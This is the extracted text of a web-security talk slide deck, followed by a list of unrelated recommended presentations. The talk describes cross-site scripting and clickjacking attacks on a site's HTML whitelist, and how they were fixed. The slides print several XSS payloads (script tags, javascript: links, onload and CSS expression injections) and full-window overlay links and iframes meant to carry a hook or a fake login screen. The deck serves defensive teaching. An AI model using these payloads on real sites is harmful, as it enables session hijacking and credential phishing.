how we hacked how we hacked
play

How we hacked How we hacked and what happened next and how you can - PowerPoint PPT Presentation

Oct 31, 2023 •466 likes •1.06k views

How we hacked How we hacked and what happened next and how you can be safe Ruben van Vreeland Fixed Fixed https://www.owasp.org/index.php/Top_10_2013-Top_10 <script>alert(1)</script> User Data Change Data XSS Bootstrap

  1. How we hacked How we hacked and what happened next and how you can be safe Ruben van Vreeland

  2. Fixed

  3. Fixed

  6. https://www.owasp.org/index.php/Top_10_2013-Top_10

  8. <script>alert(1)</script>

  11. User Data Change Data XSS Bootstrap Payload Passwords WEBPAGE WEBPAGE Comand & Control BROWSER Firewalled http://jsbin.com/femapijiwe/1/edit?html,output

  13. <a href="javascript:alert(/Exploit me!/)"> javascript:alert(/Exploit me!/) </a>

  16. <a href=“ javascript:payload ” BEEF HOOK style=“ width:100%; height: 100%; Set size position: fixed; Set position type left: 0px; top: 0px; Window position background: rgba(255, 0, 0, 0.5); ” Test mode ></a> http://jsbin.com/videpusaza/edit?html,output

  17. <a style=“width: expression(alert(1));” />

  18. <a href=“ javascript:payload ” style=“ width:100%; height: 100%; left: 0px; top: 0px; position: fixed; background: rgba(255, 0, 0, 0.5); ” ></a>

  21. <head> <!-- Bootstrap core CSS --> <link href="https://getbootstrap.com/dist/css/bootstrap.min.css" rel="stylesheet"> </head>

  22. bootstrap.css 3663 .dropdown-backdrop { 3664 position: fixed; 3665 top: 0; 3666 right: 0; 3667 bottom: 0; 3668 left: 0; 3669 z-index: 990; 3670 }

  23. bootstrap.css 4299 .navbar-fixed-top, 4300 .navbar-fixed-bottom { 4301 position: fixed; 4302 right: 0; 4303 left: 0; 4304 z-index: 1030; 4305 }

  24. <a href=“ javascript:payload ” BEEF HOOK width=“100%” Set full window Set full window height=“100%” class=“dropdown-backdrop Set position type Set position navbar-fixed-top”> Z-index </a> http://jsbin.com/qotixugiko/1/edit?html,output

  26. iframe

  27. <iframe src=“https://example.com/” BEEF HOOK width=“100%” Set full window Set full window height=“100%” class=“dropdown-backdrop Set position type Set position navbar-fixed-top”> Z-index </iframe> http://jsbin.com/qotixugiko/2/edit?html,output

  30. javascript link whitelisted iframe 100% covering iframe iframe cross domain iframe open redirect 100% covering link 100% covering image login screen image

  31. image link

  32. Fixed

  36. you@hackme.bitsensor.io **************** Login http://jsbin.com/daracenafa/1/edit?html,output

  37. Fixed

  38. you@hackme.bitsensor.io **************** Login http://jsbin.com/dejite/13/edit

  39. http://jsbin.com/dejite/13/edit

  41. remove from whitelist attribute: id class style form iframe oembed/embed.ly

  42. harden HTML5 iframe sandbox allow-forms allow-modals allow-popups allow-popups-to-escape-sandbox allow-same-origin allow-scripts allow-top-navigation

  43. harden HTML5 iframe sandbox allow-forms allow-modals allow-popups allow-popups-to-escape-sandbox allow-same-origin allow-scripts allow-top-navigation

  45. attempts 1 javascript link 5 whitelisted iframe 10 100% covering iframe 11 iframe cross domain 14 iframe open redirect 20 100% covering link 23 100% covering image 25 covering image & link

  46. <img src=“ /uploads/mycatpicture.png ” /> <img src=“ ” “ ” /> <img src=“ ” /> <a “ ” /> <img src=“ ” /><script>alert(1)</script><a “ ” />

  47. <img src=“ /favicon.png ” /> <img src=“ /favicon.png” “ ” /> <img src=“ /favicon.png” onload=“ “ ” /> <img src=“ /favicon.png” onload=“alert(1) “ ” />

  48. <a href=“http://twitter.com/@EnableBitSensor”/> <a href=“ ”/> <a href=“javascript: alert(1) ”/> <a href=“javascript:// alert(1) ”/> <a href=“javascript://%0Aalert(1) ”/>

  49. <script> var user = ruben ;</script> <script> var user = ruben; alert(1) ;</script>

  50. <div style=“width: 10px ;”/> <div style=“width: expression(alert(1)) ;”/>

  51. security metrics logging (ELK) exceptions ids/ips (modsecurity)

  55. https://git.bitsensor.io/plugins/java-spring

  57. 30 juni GOTO Night Eindhoven Hackers using the ELK stack training

  58. +31 (0)6 122 10 587 ruben@bitsensor.io 0x4D4ED75AD9BB92F8

  59. Stay safe.

Recommend

Welcome to NEOnets Cyber Security Executive Briefing If you havent yet been hacked, you

Welcome to NEOnets Cyber Security Executive Briefing If you havent yet been hacked, you

Welcome to NEOnets Cyber Security Executive Briefing If you havent yet been hacked, you will be. In fact, you already may have been hacked, but dont know it yet. Stu Davis, Chief Information Officer, Ohio Department of

600 views • 45 slides
How we hacked and how you can be safe and what happened next Ruben van Vreeland Ruben van

How we hacked and how you can be safe and what happened next Ruben van Vreeland Ruben van

How we hacked How we hacked and how you can be safe and what happened next Ruben van Vreeland Ruben van Vreeland Web Application Security Web hosting / infrastructure Web applications / platforms VB6, C#, PHP, (Spring) Java

569 views • 29 slides
Your web server has been hacked now what? Archzilon Eshun-Davies (@laudarch)_ CISO/CEO Tactical

Your web server has been hacked now what? Archzilon Eshun-Davies (@laudarch)_ CISO/CEO Tactical

Your web server has been hacked now what? Archzilon Eshun-Davies (@laudarch)_ CISO/CEO Tactical Intelligence Security OWASP Ghana 2019 Who is this talk for? - Individuals, developers and sys admins. Are you sure youve been hacked? Q1:

247 views • 11 slides
Hardening WordPress (or, How Not To Get Hacked And What To Do When You Are) Gregory Ray dot

Hardening WordPress (or, How Not To Get Hacked And What To Do When You Are) Gregory Ray dot

Hardening WordPress (or, How Not To Get Hacked And What To Do When You Are) Gregory Ray dot gray inc. @dotgray Sunday, March 15, 15 Resources Codex.WordPress.org / Hardening_WordPress Blog.Sucuri.net / WordPress Security WPSecure.net /

608 views • 32 slides
Identity Risk &amp; Governance I may not get hacked but I know I will be audited! 1

Identity Risk &amp; Governance I may not get hacked but I know I will be audited! 1

A Strategic Portfolio Focus on Identity Risk &amp; Governance I may not get hacked but I know I will be audited! 1 #GetIAMRight | One Identity - Restricted - Confidential IAM Risk Framework Provide a comprehensive view of real-time

366 views • 13 slides
The Shocking Secrets of the Electric Grid !!! Are Current Fears That It Can Be Hacked Well

The Shocking Secrets of the Electric Grid !!! Are Current Fears That It Can Be Hacked Well

The Shocking Secrets of the Electric Grid !!! Are Current Fears That It Can Be Hacked Well Grounded? Eastern Western Texas Transmission G L Generation Load Kilowatt = 1 thousand watts Megawatt = 1 million watts Gigawatt = 1

323 views • 18 slides
HACKED EVIDENCE - NOW WHAT? Kyiv Arbitration Days, 13 September 2019 Veronika Korom Solicitor,

HACKED EVIDENCE - NOW WHAT? Kyiv Arbitration Days, 13 September 2019 Veronika Korom Solicitor,

HACKED EVIDENCE - NOW WHAT? Kyiv Arbitration Days, 13 September 2019 Veronika Korom Solicitor, England &amp; Wales Avocat au Barreau de Paris ESSEC Business School This copy is for your personal, non-commercial use only. To order

457 views • 8 slides
How I Hacked facebook Again! by Orange Tsai Orange Tsai Principal security researcher at

How I Hacked facebook Again! by Orange Tsai Orange Tsai Principal security researcher at

How I Hacked facebook Again! by Orange Tsai Orange Tsai Principal security researcher at DEVCORE Captain of HITCON CTF team 0day researcher, focusing on Web/Application security orange_8361 Infiltrating Corporate Intranet Like NSA

764 views • 75 slides
How we hacked Online Banking Malware Sebastian Bachmann &amp; Tibor Eli as 22. November

How we hacked Online Banking Malware Sebastian Bachmann &amp; Tibor Eli as 22. November

How we hacked Online Banking Malware Sebastian Bachmann &amp; Tibor Eli as 22. November 2014 B-Sides Vienna Sebastian Bachmann &amp; Tibor Eli as How we hacked Online Banking Malware 22. November 2014 1 / 55 About Us About:

576 views • 55 slides
#Hacked How safe is your city? Mike Sturm, IT Director, City of San Marcos Beth Ann Unger, IS

#Hacked How safe is your city? Mike Sturm, IT Director, City of San Marcos Beth Ann Unger, IS

2/28/2019 #Hacked How safe is your city? Mike Sturm, IT Director, City of San Marcos Beth Ann Unger, IS Manager, City of Frisco How frequently are local governments under cyberattack? 70 60 50 40 30 20 10 0 Hourly or more At least

437 views • 18 slides
View The Email to Get Hacked: Attacking SMS-based Two-Factor Authentication Philipp Markert,

View The Email to Get Hacked: Attacking SMS-based Two-Factor Authentication Philipp Markert,

View The Email to Get Hacked: Attacking SMS-based Two-Factor Authentication Philipp Markert, Florian Farke, and Markus Drmuth Santa Clara, California, USA | WAY 2019 | August 11, 2019 Two-Factor Authentication 1 1 2 1 Gmail 2FA

415 views • 28 slides
Secure Audit Logging Systems Secure Audit Logging Systems Richard Kramer, Member IEEE Oregon

Secure Audit Logging Systems Secure Audit Logging Systems Richard Kramer, Member IEEE Oregon

Secure Audit Logging Systems Secure Audit Logging Systems Richard Kramer, Member IEEE Oregon State University 1 How does someone know they have been HACKED!? and WHO did it!? HACKED!? and WHO did it!? 2 Audit Logs in the News!

701 views • 51 slides
Aim Inspired by this I wanted to look into the following: Is it possible to collect

Aim Inspired by this I wanted to look into the following: Is it possible to collect

Twitter sentiment vs. Stock price Background On April 24 th 2013, the Twitter account belonging to Associated Press was hacked. Fake posts about the Whitehouse being bombed and the President being injured were posted. This lead to a

467 views • 23 slides
Page 1 1 Review: Exploiting Coherence Review: Precise Collisions hacked clean up player

Page 1 1 Review: Exploiting Coherence Review: Precise Collisions hacked clean up player

University of British Columbia Review: Picking Methods CPSC 314 Computer Graphics manual ray intersection May-June 2005 y Tamara Munzner VCS x Textures, Procedural Approaches, bounding extents Sampling Week 4, Thu Jun 2

381 views • 19 slides
accounts hacked among several in recent weeks to come upon security breaches in their AP

accounts hacked among several in recent weeks to come upon security breaches in their AP

HEADLINES Impact and Cost According to the Ponemon At least 19 states have Institutes most recent introduced or are considering &quot;Annual Study: U.S. Cost of security breach legislation in a Data Breach&quot; (March 2014. Most of the

401 views • 12 slides
The Onslaught of Cyber Security Threats and What that Means to You No End in Sight for Cyber

The Onslaught of Cyber Security Threats and What that Means to You No End in Sight for Cyber

The Onslaught of Cyber Security Threats and What that Means to You No End in Sight for Cyber Crime Growth Number of mobile 200M devices affected IBM 11.6M Number of accounts hacked CNN Money 432M Number of malware samples collected Intel

652 views • 30 slides
Safety-critical Nick Kofinas Devices The Stuxnet Worm(s) Most of the following are

Safety-critical Nick Kofinas Devices The Stuxnet Worm(s) Most of the following are

How everything can be hacked Safety-critical Nick Kofinas Devices The Stuxnet Worm(s) Most of the following are Maybes Main target: Iranian nuclear program Main physical targets Centrifuge devices PLC controllers The

402 views • 21 slides
http://detector.io kaie@kuix.de Most Certificate Authorities (CA) have the power to issue

http://detector.io kaie@kuix.de Most Certificate Authorities (CA) have the power to issue

http://detector.io kaie@kuix.de Most Certificate Authorities (CA) have the power to issue certificates for any domain This means, most CAs are single point of failures, they might get hacked, or their power could get abused (by creating

534 views • 26 slides
15-Minute Linux DFIR Triage Dr. Phil Polstra Bloomsburg University of Pennsylvania What is this

15-Minute Linux DFIR Triage Dr. Phil Polstra Bloomsburg University of Pennsylvania What is this

15-Minute Linux DFIR Triage Dr. Phil Polstra Bloomsburg University of Pennsylvania What is this talk about? Determining with some certainty if you have been hacked In a matter of minutes With minimal disturbance to the subject system

518 views • 39 slides
Addressing the Asymmetry Problem Bob Cowles bob.cowles@gmail.com BrightLite Information

Addressing the Asymmetry Problem Bob Cowles bob.cowles@gmail.com BrightLite Information

Addressing the Asymmetry Problem Bob Cowles bob.cowles@gmail.com BrightLite Information Security 3 August 2016 QRS 2016 CRE Workshop Panel Discussion Vienna, Austria Value of a Hacked PC http://

422 views • 14 slides
COSC345 Week 23 Software Architecture 16 September 2014 Richard A. O Keefe 1 About Real

COSC345 Week 23 Software Architecture 16 September 2014 Richard A. O Keefe 1 About Real

COSC345 Week 23 Software Architecture 16 September 2014 Richard A. O Keefe 1 About Real Architecture The disappointment of Bath: architect-designed fa cades, builder- hacked interiors and backs. The importance of Alexander: pattern

482 views • 19 slides
WELCOME! BERTRAND DUTEIL Organizer of the Digital Pride Hackathon &amp; Project Leader of

WELCOME! BERTRAND DUTEIL Organizer of the Digital Pride Hackathon &amp; Project Leader of

WELCOME! BERTRAND DUTEIL Organizer of the Digital Pride Hackathon &amp; Project Leader of Unicorns in Tech TONIGHTS AGENDA 2020 - The year that hacked the Pride Parades by Stuart Cameron - Agenda &amp; Tools - Code of conducts

413 views • 17 slides
Simple WordPress Security Barry Gould, BlogSec.net Barry@blogsec.net Why should we worry?

Simple WordPress Security Barry Gould, BlogSec.net Barry@blogsec.net Why should we worry?

Simple WordPress Security Barry Gould, BlogSec.net Barry@blogsec.net Why should we worry? Hacked site = Loss of business / reputation from loss of customer trust. Cleanup costs. Even small sites are at risk; bots dont discriminate!

326 views • 20 slides
Hardware-based Cryptography Smart cards, YubiKeys &amp; more Karol Babioch Security Engineer

Hardware-based Cryptography Smart cards, YubiKeys &amp; more Karol Babioch Security Engineer

Hardware-based Cryptography Smart cards, YubiKeys &amp; more Karol Babioch Security Engineer kbabioch@suse.de Rationale - Computers running general purpose software can be compromised hacked Offline-access, etc. -

619 views • 26 slides

More recommend